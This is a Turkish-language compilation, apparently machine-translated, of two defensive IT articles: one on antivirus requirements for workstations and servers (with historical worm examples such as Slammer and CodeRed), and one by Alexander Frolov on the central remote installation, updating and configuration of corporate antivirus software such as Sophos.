Bu ayarlar, taranacak bilgisayar gruplarını ve etki alanlarını tanımlamanıza olanak tanır. Bir işletmenin (ofis) bilgisayar ağının anti-virüs koruması Bir anti-virüs koruma sunucusunun yapılandırılması

Yukarıdaki gerekçeye ve örneklere dayanarak, iş istasyonları için antivirüsler için temel gereksinimleri formüle edebiliriz. Bu gereksinimlerin farklı sınıflardaki iş istasyonları için farklı olacağı açıktır.

Windows İş İstasyonları için Antivirüs Gereksinimleri

Daha önce olduğu gibi, gereksinimler birkaç kategoriye ayrılacaktır:

  1. Genel Gereksinimler- güvenilirlik, performans, kullanım kolaylığı, düşük maliyet - bir kez daha tekrar etmenin anlamı yok
  2. Birincil gereksinimler- ana görevin bir sonucu olarak:
    • Bilgisayar virüslerini tespit etmek ve etkisiz hale getirmek için yerel sürücülerdeki tüm dosyaları okuma, yazma, başlatma için kontrol etme
    • Çıkarılabilir ve ağ sürücülerini kontrol etme
    • hafıza kontrolü
    • Gelen ve giden mesajların virüs kontrolü, hem mesajların kendileri hem de ekleri kontrol edilmelidir.
    • Web sayfalarının komut dosyalarını ve diğer aktif öğelerini kontrol etme
    • Microsoft Office belgelerindeki ve diğer uygulama dosyalarındaki makroları kontrol etme
    • Bileşik dosyaları kontrol etme - arşivler, kendi kendine açılan arşivler, paketlenmiş yürütülebilir dosyalar, posta veritabanları, posta biçimi dosyaları, OLE kapsayıcıları
    • Varsayılan olarak, virüslü dosyalarda gerçekleştirilecek farklı eylemleri seçme imkanı:
      • engelleme (gerçek zamanlı olarak kontrol ederken)
      • günlüğe kaydetme (istek üzerine kontrol ederken)
      • kaldırma
      • karantinaya almak
      • tedavi
      • kullanıcı eylemi isteği
    • Virüslü dosyaların tedavisi
    • Arşivlerdeki virüslü dosyaların tedavisi
    • İstenen - potansiyel olarak istenmeyen programların tespiti (reklam yazılımı ve casus yazılım, bilgisayar korsanlığı araçları vb.)
  3. Yönetim Gereksinimleri
    • Yerel bir grafik arayüzünün varlığı
    • Uzaktan ve merkezi yönetim imkanı (kurumsal versiyon)
    • Çalıştırmak için tarama ve güncelleme görevlerini zamanlama yeteneği
    • İsteğe bağlı olarak herhangi bir görevi çalıştırma veya herhangi bir eylemi gerçekleştirme yeteneği (manuel olarak)
    • Ayrıcalıksız bir kullanıcının eylemlerini anti-virüs kompleksi ile ilgili olarak kısıtlama yeteneği
  4. Güncelleme Gereksinimleri
    • Çeşitli güncelleme kaynakları için destek, nominal olarak:
      • HTTP veya FTP kaynağı
      • Yerel veya ağ klasörü
      • Merkezi güncelleme sistemi (kurumsal sürümlerde)
    • Anti-virüs veritabanlarını, anti-virüs motorunu ve uygulama modüllerini güncelleme yeteneği
    • Güncellemeleri isteğe bağlı olarak manuel olarak veya bir programa göre otomatik olarak gerçekleştirme yeteneği
    • Anti-virüs veritabanı güncellemelerini geri alma yeteneği
  5. Teşhis için gereksinimler
    • Yerel kullanıcının önemli olaylar hakkında bilgilendirilmesi - virüs algılama, antivirüs durum değişikliği vb.
    • Antivirüs ve/veya bireysel görevlerin günlüklerini tutmak
    • Anti-virüs güvenlik yöneticisinin bildirimi (kurumsal sürümde)
Linux/Unix iş istasyonları için antivirüs gereksinimleri
  1. Genel Gereksinimler- pratikte değişmedi: güvenilirlik, performans, düşük maliyet. Unix sistemlerinde kullanılabilirlik, geleneksel olarak Windows sistemlerinden biraz farklı kriterlere göre değerlendirilir, ancak bu durum yavaş yavaş gereksinimlerin birleştirilmesine doğru değişiyor.
  2. Birincil gereksinimler- hedefe göre:
    • İsteğe bağlı dosya ve dizinlerin virüslere karşı taranması
    • Arzu edilir, ancak kritik değildir - dosyalara erişirken belirli dizinleri gerçek zamanlı olarak kontrol etmek. Böyle bir işlevselliğe gerçekten ihtiyaç duyuluyorsa, bu bir sunucudan çok bir iş istasyonu değildir - Unix sistemlerinde ikisi arasında net bir fark yoktur.
    • Bileşik nesnelerdeki virüslerin algılanması - arşivler, kendi kendine açılan arşivler, paketlenmiş yürütülebilir modüller, posta veritabanları, posta biçimi dosyaları, OLE kapsayıcıları - Unix ortamında yaygın olan biçimlerle sınırlı değildir
    • Varsayılan olarak, virüslü dosyalar algılandığında yapılacak eylemi seçme imkanı:
      • silmek
      • taşı veya yeniden adlandır
      • davranmak
      • bir rapora bilgi yazmak
      • kullanıcıdan bir işlem yapmasını ister (istek üzerine kontrol ederken)
    • Virüslü dosyaların tedavisi
    • Arzu edilen - arşivlerde tedavi imkanı
  3. Yönetim Gereksinimleri
    • Yapılandırma dosyalarını düzenleyerek yerel yönetim
    • Tercihen - web arayüzü üzerinden uzaktan kontrol
    • Eylemleri çalıştırmak ve gerçekleştirmek için görevleri zamanlama yeteneği
    • Görevleri ve eylemleri manuel olarak gerçekleştirme yeteneği
  4. Teşhis için gereksinimler
    • İş günlüklerinin tutulması
    • Anti-virüs güvenlik yöneticisi bildirimi

Sunucu koruması

Genel olarak antivirüs koruması sunucular, iş istasyonlarını korumaktan, örneğin ağ geçitlerini korumaktan farklı değildir. Ana tehditler ve bunlara karşı koyacak teknolojiler aynı kalıyor - sadece vurgu değişiyor.

Ağ sunucuları, iş istasyonları gibi, kullanılan işletim sistemlerine göre doğal olarak sınıflara ayrılır:

  • Windows sunucuları
  • Novell Netware Sunucuları
  • Unix sunucuları

Bölünme ilkesi, çeşitli işletim sistemlerinin karakteristik virüs tehditlerinden ve sonuç olarak antivirüsün ana görevini belirlemede çeşitli seçeneklerden kaynaklanmaktadır.

Sunucu koruma ürünleri söz konusu olduğunda, kişisel ve ağ ürünlerine bölünme yoktur - tüm ürünler ağdır (kurumsal). Pek çok üretici, kurumsal ürünleri iş istasyonu ve dosya sunucusu ürünlerine hiç ayırmaz - tek bir ürünleri vardır.

Spesifik tehditler ve karşı önlemler

Sunucuya özgü tüm tehditler, sunucu işletim sistemlerinin özellikleriyle değil, sunuculara özgü savunmasız yazılımların kullanımıyla ilişkilidir.

Microsoft Windows sunucuları

Windows sunucuları için, tüm aynı tehditler, Windows NT/2000/XP altındaki iş istasyonları için geçerlidir. Farklılıklar, yalnızca, iş istasyonları için tipik olmayan bir dizi ek saldırıda ifade edilen, sunucuları çalıştırmanın baskın biçimindedir.

Bu nedenle, kullanıcılar nadiren doğrudan Windows sunucularının arkasında çalışır; bu, sunuculardaki posta istemcilerinin ve ofis uygulamalarının kural olarak kullanılmadığı anlamına gelir. Sonuç olarak, posta istemcisi düzeyinde posta koruması gereksinimleri ve Windows sunucuları durumunda ek makro virüs algılama araçları daha az talep görmektedir.

Örnek. Kaspersky Anti-Virus for Windows Dosya Sunucuları, Kaspersky Anti-Virus for Windows Workstations'ın aksine, Microsoft Office belgeleriyle çalışırken yürütülen makroların davranışsal analizi için bir modül ve gelen ve giden postaları kontrol etmek için bir modülden yoksundur. Bu, ürünün makro virüslerine ve posta solucanlarına karşı korumasının olmadığı anlamına gelmez - daha önce de belirtildiği gibi, sonunda, tüm açılan dosyalar dosya sisteminin gerçek zamanlı koruma modülü tarafından kontrol edilir - sadece sunucu çalışmasının özellikleri gerektirmez çalışma istasyonlarında olduğu gibi ek koruma araçları.

Öte yandan, Microsoft SQL Server ve Microsoft IIS gibi hizmetler, Windows sunucularında iş istasyonlarından çok daha sık kullanılabilir. Microsoft (ve yalnızca Microsoft değil) tarafından üretilen işletim sistemleri gibi, bu hizmetler de virüs yazarları tarafından defalarca istismar edilen güvenlik açıkları içerebilir.

Örnek. 2003 yılında, NetWorm.Win32.Slammer solucanı ortaya çıktı ve Microsoft SQL Server 2000'deki bir güvenlik açığını kullanarak kelimenin tam anlamıyla İnternet'i taradı. Slammer, dosyalarını diske kaydetmedi, doğrudan SQL Server uygulamasının adres alanında çalıştı. Bundan sonra, sonsuz bir döngüde, solucan ağdaki rastgele IP adreslerine bir saldırı gerçekleştirerek, aynı güvenlik açığını nüfuz etmek için kullanmaya çalıştı. Solucan etkinliğinin bir sonucu olarak, sunucular ve İnternet iletişim kanalları, tüm ağ segmentleri kullanılamayacak kadar aşırı yüklendi. Güney Kore özellikle salgından çok etkilendi. Solucanın üreme dışında başka hiçbir işlem yapmadığını belirtmekte fayda var.

Örnek. Daha önce, 2001'de, Microsoft IIS 5.0'daki bir güvenlik açığı NetWorm.Win32 solucanı tarafından istismar edildi. KodKırmızı.a. Salgının sonuçları Slammer solucanında olduğu kadar etkileyici değildi, ancak diğer yandan CodeRed .a bulaşmış bilgisayarlar kullanılarak ABD Beyaz Saray web sitesine (www) yapılan bir DDoS saldırısı başarısız olmadı. .whitehouse.gov). CodeRed .a ayrıca etkilenen sunuculara dosya kaydetmedi.

Her iki solucanın özelliği, dosya sistemi kontrol modülünün (istek üzerine veya erişim üzerine) onlara karşı güçsüz olmasıdır. Bu solucanlar kendilerinin kopyalarını diske kaydetmezler ve genellikle artan ağ etkinliği dışında sistemde varlıklarını hiçbir şekilde göstermezler. Bugüne kadar, koruma için ana öneri, işletim sistemi ve kullanılan yazılım için yamaların zamanında yüklenmesidir. Diğer bir yaklaşım, güvenlik duvarlarını, savunmasız hizmetler tarafından kullanılan bağlantı noktalarına dışarıdan erişilemeyecek şekilde yapılandırmaktır - Slammer'a karşı koruma durumunda makul bir gereklilik, ancak CodeRed'e karşı koruma için kabul edilemez.

Lovesan, Sasser, Mytob vb. gibi zaten doğrudan savunmasız işletim sistemi hizmetlerine saldıran solucanlar da Windows sunucuları için geçerli olmaya devam etmektedir. bahsedilen solucanlar, başarılı bir şekilde saldırıya uğrarsa, dosyalarını sabit sürücüye kaydeder).

Saldırıların doğası göz önüne alındığında, Windows sunucularını korumanın ana araçlarının şunlar olduğu sonucuna varabiliriz: erişime bağlı dosya tarama modülü, isteğe bağlı dosya tarama modülü, komut dosyası doğrulama modülü ve ana teknolojiler imza ve buluşsal analizdir. (komut dosyası doğrulama modülündeki davranış analizinin yanı sıra).

Novell Netware Sunucuları

Novell Netware'e bulaşabilecek belirli virüsler yoktur. Doğru, Novell sunucularına erişim haklarını çalan birkaç Truva atı vardır, ancak bunlar yine de Windows işletim sistemi ortamında çalışacak şekilde tasarlanmıştır.

Buna göre, Novell Netware sunucusunun antivirüsü aslında bu sunucuyu korumak için tasarlanmamıştır. O halde işlevi nedir? Virüslerin yayılmasını önlemek için. Novell Netware sunucuları çoğunlukla dosya sunucuları olarak kullanılır; Windows bilgisayar kullanıcıları dosyalarını bu tür sunucularda depolayabilir veya Novell Netware birimlerinde bulunan programları çalıştırabilir. Virüslerin Novell sunucusunun paylaşılan kaynaklarına sızmasını veya bu tür kaynaklardan virüsleri çalıştırmasını / okumasını önlemek için bir antivirüs gereklidir.

Buna göre, Novell Netware için antivirüste kullanılan ana araçlar erişim ve isteğe bağlı taramalardır.

Novell Netware için antivirüslerde kullanılan belirli teknolojilerden, sunucuya kötü amaçlı programlar yazan istasyonların ve/veya kullanıcıların engellenmesine dikkat etmek gerekir.

Unix sunucuları

Aynısı, Novell Netware sunucuları hakkında olduğu gibi Unix sunucuları için de söylenebilir. Unix sunucuları için antivirüs, sunucuların kendilerini enfeksiyondan koruma görevini değil, virüslerin sunucu aracılığıyla yayılmasını önleme görevini çözer. Bunun için aynı iki ana araç kullanılır:

  • Talep üzerine dosyaları kontrol etme
  • Erişimdeki dosyaları kontrol etme

Örnek. Unix/Linux Dosya Sunucuları için Kaspersky Anti-Virus bir erişime bağlı tarama modülü içerirken Kaspersky Anti-Virus for Linux Workstations içermez. Bu, Linux iş istasyonlarının ve sunucularının çeşitli işlevlerinden kaynaklanmaktadır - yalnızca (veya çoğunlukla) Linux istasyonları üzerine kurulmuş bir ağda, neredeyse hiç virüs bulaşma riski yoktur ve bu nedenle tüm dosya işlemlerini kontrol eden bir modüle acilen ihtiyaç yoktur. . Aksine, bir Linux bilgisayar, dosyaları depolamak ve aktarmak için aktif olarak kullanılıyorsa (özellikle bir Windows ağında), o zaman aslında bir sunucudur ve sürekli dosya izleme gerektirir.

Pek çok tanınmış Linux solucanı, güvenlik açıklarını işletim sisteminin kendisinde değil, sistem ve uygulama yazılımında, wu-ftpd ftp sunucusunda, Apache web sunucusunda yaymak için kullanır. Bu tür uygulamaların iş istasyonlarından çok sunucularda kullanıldığı açıktır, bu da sunucuları korumak için geliştirilmiş önlemler lehine ek bir argümandır.

Microsoft ağları desteğinin yerleşik bir özellik olduğu Novell sunucularının aksine, Unix sunucuları varsayılan olarak SMB/CIFS dosya aktarımları için yapılandırılmaz. Bu amaçla özel bir yazılım paketi kullanılır - Microsoft ağlarıyla uyumlu paylaşılan kaynaklar oluşturmanıza olanak tanıyan Samba.

Dosyalar yalnızca SMB/CIFS protokolleri aracılığıyla değiş tokuş ediliyorsa, tüm dosya işlemlerini kontrol etmenin bir anlamı olmadığı açıktır, yalnızca Samba sunucusu kullanılarak aktarılan dosyaları kontrol etmek yeterlidir.

Örnek. Kaspersky Lab'ın ürün yelpazesi özel bir çözüm içerir - Samba yazılımı kullanılarak Unix sunucularında oluşturulan paylaşımlı klasörleri korumak için özel olarak tasarlanmış Kaspersky Anti-Virus for Samba Server. Bu ürün, dosya işlemlerini kontrol eden bir modül içermez, bunun yerine Samba'da yerleşik olarak bulunan ve iletilen tüm dosyaları yakalayan bir filtre kullanır.

(C) Alexander Frolov, 2001
[e-posta korumalı], http://www.frolov.pp.ru, http://www.datarecovery.ru

Makalenin amacı, onlarca ve yüzlerce sunucunun yanı sıra yüzlerce ve binlerce iş istasyonuna sahip orta ve büyük şirketlerde kullanılmak üzere tasarlanmış anti-virüs sistemlerinde en modern uzaktan yönetim ve kontrol araçlarını anlatmaktır. Sophos, Norton AntiVirus, Mcafee NetShield, Trend Virus Control System ve diğer antivirüs programları için uzaktan yönetim ve kontrol araçları araştırıldı.

1. Uzaktan yönetim ve kontrol ihtiyacı

Orta ve büyük şirketler için anti-virüs programlarının merkezileştirilmiş uzaktan yönetimi ve kontrolü, kurumsal ağ genelinde anti-virüs koruma teknolojisine uyum için gereklidir.

Virüsten koruma veritabanı güncellemelerinin izlenmesi ve virüsten koruma programlarının modüllerinin yüklenmesi, iş istasyonlarında ve sunucularda virüs algılamanın etkinliğinin izlenmesi vb. gibi işlemlerin "manuel" modda gerçekleştirilmesi, ağda çok sayıda ağ varsa etkisizdir. kullanıcılar veya ağ coğrafi olarak ayrılmış bölümlerden oluşuyorsa.

Yukarıdaki işlemlerin zamanında ve verimli bir şekilde yürütülmesini sağlamazsanız, şirket ağının virüsten koruma teknolojisi mutlaka ihlal edilecek ve bu da er ya da geç bir virüs bulaşmasına yol açacaktır. Örneğin, kullanıcılar virüsten koruma veritabanının otomatik güncellemesini yanlış yapılandırabilir veya böyle bir güncelleme devam ederken bilgisayarlarını kapatabilir. Sonuç olarak, otomatik güncellemeler gerçekleştirilmeyecek ve yeni virüslerle potansiyel bir enfeksiyon tehdidi olacaktır.

Nitelikli bir sistem yöneticisinin hizmetleri oldukça pahalı olduğu için, büyük şirketlerin bile kadrosunda bu türden çok az sayıda çalışan bulunur. Anti-virüs programlarının çalışmasını yönetmek ve izlemek için özel merkezi sistemler olmadan, bir şirket ağındaki yüzlerce ve binlerce bilgisayarda anti-virüs koruma teknolojisi ile uyumu fiziksel olarak garanti edemezler.

Aynı zamanda, uzaktan kontrol ve yönetim sistemleri, 10 dakikada 1000'den fazla bilgisayarda anti-virüs veritabanlarını güncelleyebilir ve anti-virüsleri önyükleyebilir (Sophos anti-virüs verileri burada verilmiştir).

Antivirüslerin uzaktan yönetimi ve kontrolü için sistemlere ihtiyaç duyulmasının bir başka nedeni de "tembel" kullanıcılardır.

Kural olarak, kullanıcılar işleriyle tamamen meşguldürler ve sistem çalışmasıyla dikkatlerini dağıtmak için ne arzuları ne de fırsatları vardır. Özellikle antivirüslerin kurulması ve yapılandırılması, taramaların çalıştırılması veya antivirüs veritabanlarının güncellenmesi, kullanıcılar tarafından sistem yöneticilerinin veya diğer teknik servislerin sorumluluğu olarak kabul edilir. Sistem yöneticisinin işini yaptığına inanan kullanıcılar, genellikle anti-virüs güvenlik talimatlarının gereksinimlerini tamamen göz ardı eder veya hiç okumazlar.

Bu koşullar altında, anti-virüs koruma sistemleri kullanıcı dostu olmalı, gerekli tüm işlemleri kullanıcı için otomatik ve fark edilmeden gerçekleştirmelidir. Bu, yalnızca dosya tarama için değil, aynı zamanda antivirüslerin yüklenmesi, yapılandırılması ve güncellenmesi gibi işlevler için de geçerlidir.

Aynı zamanda, sistem yöneticisi, anti-virüs yazılımını uzaktan kurmalı ve güncellemeli ve bunun için iş istasyonunu kullanarak herhangi bir iş istasyonunda ve ağ sunucusunda anti-virüs korumasının durumunu izlemelidir. Bu ilke, tüm modern kurumsal anti-virüs koruma sistemlerinin temelini oluşturur.

2. Uzaktan yönetim ve kontrol işlevleri

Bu bölümde modern anti-virüs sistemlerinde uygulanan uzaktan yönetim ve kontrol fonksiyonlarını inceleyeceğiz. İşte bu tür işlevlerin bir listesi:

  • anti-virüs programlarının uzaktan kurulumu ve güncellenmesi;
  • anti-virüs veritabanlarının uzaktan güncellenmesi;
  • antivirüslerin merkezi kurulumu için dağıtım kitlerinin ağ sunucularına oluşturulması ve kopyalanması;
  • iş istasyonlarına ve sunuculara kurulu anti-virüs programlarının uzaktan yapılandırılması;
  • şirket ağına bağlı yeni iş istasyonlarının otomatik olarak algılanması ve ardından bu istasyonlara anti-virüs programlarının otomatik olarak yüklenmesi;
  • herhangi bir ağ bilgisayarında hemen veya gecikmeli başlatma için zamanlama görevleri (programların güncellenmesi, virüsten koruma veritabanı, dosyaların taranması vb.);
  • iş istasyonlarında ve ağ sunucularında anti-virüs işlem sürecinin gerçek zamanlı gösterimi

Bunun hakkında daha ayrıntılı konuşalım.

Antivirüs programlarının uzaktan kurulumu ve güncellenmesi

Bir virüsten koruma programının manuel olarak yüklenmesi, genellikle yükleyicinin çalıştırılmasından oluşur ve etkileşimli bir yükleme sihirbazı tarafından yönlendirilir. Bu durumda, sihirbazın iletişim kutularında, programın kurulacağı yerel sürücüyü ve dizini seçmeli, ayrıca programın parametrelerini ve çalışma modlarını ayarlamalısınız.

Kullanıcı Sorunları

Bu işlem iş istasyonları için basit olsa da kurumsal ağlarda genellikle bir sistem yöneticisi veya teknik personel tarafından gerçekleştirilir. Çoğu kullanıcının virüsten koruma teknolojileri hakkında yalnızca belirsiz bir fikri olduğundan veya hiçbir fikri olmadığından (ve buna gerek de yoktur!), sistem yöneticileri bu işlemi gerçekleştirmeleri için onlara güvenmezler. Sunucuya antivirüs yüklemeye gelince, bu sadece sistem yöneticisi tarafından yapılır.

Sistem kaynaklarına gerekli düzeyde erişim eksikliği

Kullanıcının iş istasyonunda Microsoft Windows NT/2000 işletim sistemleri kuruluysa, erişim ilkesini uygun şekilde ayarlayarak, iyi bir sistem yöneticisi genellikle kullanıcıların herhangi bir programı kendi başlarına yüklemelerini yasaklar. Ayrıca, sistem yöneticisi haklarıyla yerel etki alanına bağlanmayı yasaklar. Bu durumda, kullanıcının antivirüsü kendi başına kurma ve yapılandırma fiziksel yeteneği yoktur.

Şirketin uzak şubelerindeki sorunlar

Virüsten koruma programlarının manuel olarak yüklenmesiyle ilgili başka bir sorun, genellikle personelinde sistem yöneticisi olmayan şirketlerin uzak şubelerinde ortaya çıkar. Yönetici ara sıra ihtiyaç olduğunda bu şubelere gelir. Aynı zamanda, uzak bir şubede çalışan çalışanlar genellikle şubenin yerel ağının sunucusuna ve iş istasyonlarına antivirüs yüklemek için gerekli kaynaklara erişemezler.

Çok fazla zaman yatırımı

Bir yönetici veya teknik personel, bir şirket ağındaki tüm iş istasyonlarını atlayarak antivirüsleri manuel olarak kurabilse bile, çok fazla zaman alabilir - sonuçta yüzlerce ve binlerce bilgisayar bir şirket ağına bağlanabilir. Ayrıca bilgisayarlar onarılır, üzerlerinde kurulu yazılımlar değiştirilir ve antivirüslerin yeniden yüklenmesini gerektiren diğer işlemler yapılır.

Sophos antivirüslerinin uzaktan otomatik kurulumu

Bu nedenle, piyasanın kurumsal sektöründe kullanıldığını iddia eden bir anti-virüs sistemi, kurumsal ağdaki tüm bilgisayarlara tek bir sistem yöneticisi iş istasyonundan uzaktan kuruluma izin vermelidir.

Örneğin, bir yönetici, Sophos anti-virüs sisteminin SAVAdmin yardımcı programını kullanarak, Merkezi Kurulum Dizinleri (CID) için dağıtım dizinlerini şirket ağındaki bazı sunuculara yerleştirerek oluşturabilir. Örneğin, merkez ofiste böyle bir dizin ve şirketin her uzak departmanı için bir dizin oluşturabilirsiniz.

Yönetici, otomatik olarak gerçekleştirilecek olan farklı CID dizinleri arasında çoğaltma ayarlayabilir. Bu durumda, tüm CID dizinlerini kendi başına güncellemesi gerekmeyecektir - virüsten koruma sisteminin dağıtım dosyalarını yalnızca ana dizinde değiştirebilirsiniz. Diğer dizinlerin içeriği (örneğin, uzak şubelerde bulunanlar) otomatik olarak güncellenecek ve bununla birlikte, ilgili yerel şube ağlarının tüm iş istasyonlarında antivirüsler de güncellenecektir.

Ardından, SAVAdmin konsolundaki yönetici, seçilen iş istasyonları, iş istasyonu grupları veya etki alanlarındaki CID kataloglarından anti-virüslerin uzaktan kurulumunu başlatır. CID içeriği değiştiğinde, ağdaki tüm antivirüsler otomatik olarak güncellenir. Yönetici, virüsten koruma programlarının sürümlerini güncelleme sürecini kontrol edebilir.

Sophos, antivirüs programlarını yükleme ve güncelleme sürecini hızlandırmak için "minimal itme ve tam çekme" teknolojisi geliştirmiştir. Bu teknoloji, paralel kurulum ve antivirüs sürümlerinin güncellenmesini içerir. Aynı zamanda 1000'den fazla bilgisayardan oluşan bir ağın güncellenmesi 10 dakikada gerçekleştirilir.

Merkezi kurulum prosedürüne daha yakından bakalım.

Merkezi Kurulum Ana Dizini Oluşturun

İlk aşamada, yönetici kendi iş istasyonundan merkezi kurulumun ana dizinini oluşturur. Bu dizin genellikle şirketin merkez ofis LAN sunucularından birinde bulunur (Şekil 1-1).

Ana merkezi kurulum dizininin oluşturulması ve içeriğinin oluşturulması, yönetici tarafından iş istasyonundan başlatılan ilk kurulum programı tarafından otomatik olarak gerçekleştirilir.

Pirinç. 1-1. Dosyaları merkezi kurulum ana dizinine kopyalama

Merkezi Kurulum Ana Dizininin Çoğaltılması

Kurumsal ağ, şubelerin sunucularına ve iş istasyonlarına anti-virüs kurulumunu önemli ölçüde hızlandırmak için nispeten yavaş iletişim kanallarıyla bağlı coğrafi olarak uzak şubeleri birleştiriyorsa, yönetici şube sunucularında merkezi kurulum dizinleri oluşturabilir (Şekil 1-). 2).

Bu dizinler, yöneticinin iş istasyonunda çalışan ilk kurulum programının kontrolü altında oluşturulur ve doldurulur. Bu durumda yönetici, ana merkezi kurulum dizininin ve diğer merkezi kurulum dizinlerinin içeriğinin otomatik olarak çoğaltılması için ayarları belirleyebilir. Ana dizinin içeriğini güncellediğinizde, merkezi kurulumdaki diğer dizinlerin içeriği yönetici tarafından tanımlanan programa göre otomatik olarak güncellenecektir.

Pirinç. 1-2. Merkezi Kurulum Ana Dizin Dosyalarını Diğer Merkezi Kurulum Dizinlerine Çoğaltma

Tüm iş istasyonlarına ve sunuculara antivirüs yükleme

Merkezi kurulumun tüm dizinleri oluşturulduktan sonra, iş istasyonlarına ve ağ sunucularına anti-virüs yükleme işlemi başlar. Kurulum tüm bilgisayarlarda aynı anda gerçekleştirilir ve her yerel ağ kendi merkezi kurulum dizinini kullanır (Şekil 1-3).

Kurulum programı yönetici tarafından belirlenir. Kurulum her şubede kendi dizininden yapıldığından bu işlem şubelerin yerel ağlarını birbirine bağlayan iletişim kanallarına aşırı yüklenmez.

Anti-virüs veritabanlarının uzaktan güncellenmesi

Yeni virüsleri tespit etmek için anti-virüs veritabanlarının zamanında güncellenmesinin uygunluğundan hiç kimse şüphe duymaz, ancak orta ve büyük şirketlerde bu prosedürün bir takım özellikleri vardır.

Bir güncelleme zamanlaması tasarlama

Her şeyden önce, virüsten koruma veritabanının otomatik olarak güncellenmesi için bir programın geliştirilmesinde zorluklar vardır.

Bildiğiniz gibi, çoğu virüsten koruma programı, virüsten koruma veritabanlarının bir programa göre, örneğin haftanın belirli saatlerinde ve günlerinde otomatik olarak güncellenmesini sağlar. Ancak, güncellemenin başarılı bir şekilde tamamlanması için, prosedür başlatıldığında bilgisayarın açık olması ve şirketin yerel intranetine veya İnternet'e bağlı olması gerekir.

Bazen sistem yöneticileri, yeni bir virüsten koruma veritabanının indirilmesinin öğle yemeğinde başlaması için bir güncelleme programı ayarlar. Ancak bilgisayar vardiyalı çalışma için kullanılıyorsa, güncelleme zamanını seçmek her zaman kolay değildir.

Pirinç. 1-3. Merkezi kurulum dizinlerinden tüm iş istasyonlarına ve kurumsal ağ sunucularına eş zamanlı kurulum

Kullanıcı zamanlaması ile ilgili sorunlar

Bunun nedeni, bir yandan kullanıcıların yetersiz nitelikleri ve doğrudan üretim görevleriyle ilgili olmayan herhangi bir sistem çalışmasını gerçekleştirme isteksizliği, diğer yandan da yapılandırmak için gerekli sistem kaynaklarına erişimin olmamasıdır. Yukarıda söylediğimiz gibi, yöneticiler genellikle sistem politikalarını normal bir kullanıcının sistem programlarını yükleyemediği veya ayarlarını kendi başına değiştiremeyeceği şekilde ayarlar.

Anti-virüs veritabanlarının merkezi güncellemesi

Modern anti-virüs sistemleri, anti-virüs veritabanlarını güncelleme sürecinin otomatik olarak merkezi yönetimine izin verir ve ayrıca yöneticiye güncellemelerin uzaktan kontrolü için gerekli tüm araçları sağlar.

Yöneticinin yönetim konsolu yalnızca güncellemeyi kontrol etmekle kalmaz, aynı zamanda gerekirse herhangi bir iş istasyonu, kullanıcı grubu veya etki alanı için zorunlu güncelleme başlatmaya da izin verir.

Güncelleme, ilk kurulumla aynı şekilde gerçekleştirilir.

İlk olarak yönetici, güncelleme dosyalarını merkezi kurulum ana dizinine yazar (Şekil 1-1). Bu dizinin içeriği daha sonra diğer merkezi kurulum dizinlerine kopyalanır (Şekil 1-2). Ve son olarak, son aşamada, sunucuların ve iş istasyonlarının anti-virüs veritabanları, merkezi kurulumun ilgili dizinlerinden güncellenir (Şekil 1-3).

Kurumsal ağ internete bağlıysa, ana merkezi kurulum dizininin içeriği, anti-virüs şirketinin sunucusundan otomatik olarak güncellenebilir. Böyle bir güncelleme için zamanlama, kurumsal ağ yöneticisi tarafından ayarlanabilir.

Kurulumdan sonra antivirüs yapılandırması

Yükleme tamamlandıktan sonra, örneğin, dosyalara herhangi bir erişimde virüsten koruma taraması sağlama ve ayrıca bir tarama sonuçları raporu oluşturma gibi bazı standart virüsten koruma yapılandırmaları seçilebilir.

Gerekirse, uzaktan yönetim ve kontrol araçları, şablon mekanizması kullanılarak belirtilen farklı bir virüsten koruma yapılandırması atamanıza izin verir. Yönetici, farklı iş istasyonları, kullanıcı grupları veya etki alanları için virüsten koruma çalışma modlarını tanımlayan bu tür birkaç şablon hazırlayabilir.

Antivirüs programlarının uzaktan yapılandırılması

Kullanımının etkinliğinin, anti-virüs programının ayarlarının ne kadar doğru yapıldığına bağlı olduğu bilinmektedir. Örneğin, işi hızlandırmak için .com veya .exe uzantısına sahip olmayan tüm dosyaları taramayı reddeden kullanıcı, ofis belge dosyaları aracılığıyla yayılan makro komut virüslerini bilgisayarına bulaştırma riskiyle karşı karşıyadır.

Kural olarak, ileri görüşlü yöneticiler, özellikle dosya tarama modlarıyla ilgili olanlar olmak üzere, virüsten koruma programı ayarlarını yapılandırmak için kullanıcılara güvenmez. Ancak bu işi kendi başlarına yapmak zorundadırlar.

Büyük kurumsal intranetlerde bazen farklı kullanıcılar, kullanıcı grupları veya etki alanları için farklı ayarlar kullanmanız gerektiğini unutmayın. Tüm bunlar, virüsten koruma ayarlarının manuel olarak yapılandırılmasını zorlaştırır.

Modern anti-virüs sistemleri, anti-virüs programlarının tüm parametrelerinin (tarayıcı çalışma modları, anti-virüs veritabanını güncelleme programı, virüslü dosyalar üzerinde yapılacak işlemler vb.) merkezi olarak uzaktan konfigürasyonuna izin verir. Bu işlem sistem yöneticisi tarafından kendi iş istasyonundan gerçekleştirilebilir ve yönetici farklı kullanıcılar, kullanıcı grupları ve etki alanları için farklı ayar şemaları uygulayabilir.

Yeni iş istasyonlarının keşfi

Büyük bir şirketin intraneti kendi hayatını yaşıyor. İçinde zaman zaman yeni iş istasyonlarının bağlanması, eski iş istasyonlarının onarılması veya değiştirilmesi vb. olaylar meydana gelir.

Aynı zamanda, ağdaki iş istasyonlarının konfigürasyonundaki tüm değişiklikler, anti-virüs araçlarının konfigürasyonlarının zamanında güncellenmesini gerektirir. Ancak, bir sistem yöneticisi, yüzlerce ve binlerce bilgisayardan oluşan bir ağdaki tüm değişiklikleri takip edemez. Bu nedenle, modern anti-virüs sistemleri, içinde yeni istasyonların ortaya çıkması veya eskilerinin değiştirilmesi için ağ yapılandırmasının otomatik olarak araştırılması için araçlarla desteklenir.

Ağ yapılandırmasında değişiklikler tespit edildiğinde, yönetim ve kontrol sistemi otomatik olarak virüsten koruma programlarını kurar veya gerekirse virüsten koruma yazılım modüllerini ve ayrıca virüsten koruma veritabanını otomatik olarak günceller. Sonuç olarak, bir iş istasyonunun kurulumundan sonra, onarımından veya değiştirilmesinden sonra, yönetici veya kullanıcının herhangi bir müdahalesi olmadan diskine bir virüsten koruma programı otomatik olarak yüklenecektir.

İş planlaması

Merkezi uzaktan yönetim ve kontrol sistemi, şirket ağındaki bireysel bilgisayarlar için, seçilen kullanıcı grupları veya etki alanları için görevleri planlamanıza ve ayrıca çalışan görevlerin ilerlemesini ve sonuçlarını kontrol etmenize olanak tanır.

Zamanlama seçimi

Planlama, çeşitli programlara göre çeşitli prosedürleri gerçekleştirme sıklığını belirlemenizi sağlar:

  • saatlik;
  • günlük;
  • haftalık;
  • haftanın veya ayların belirli günlerinde;
  • sonraki saat, haftanın veya ayın günü;
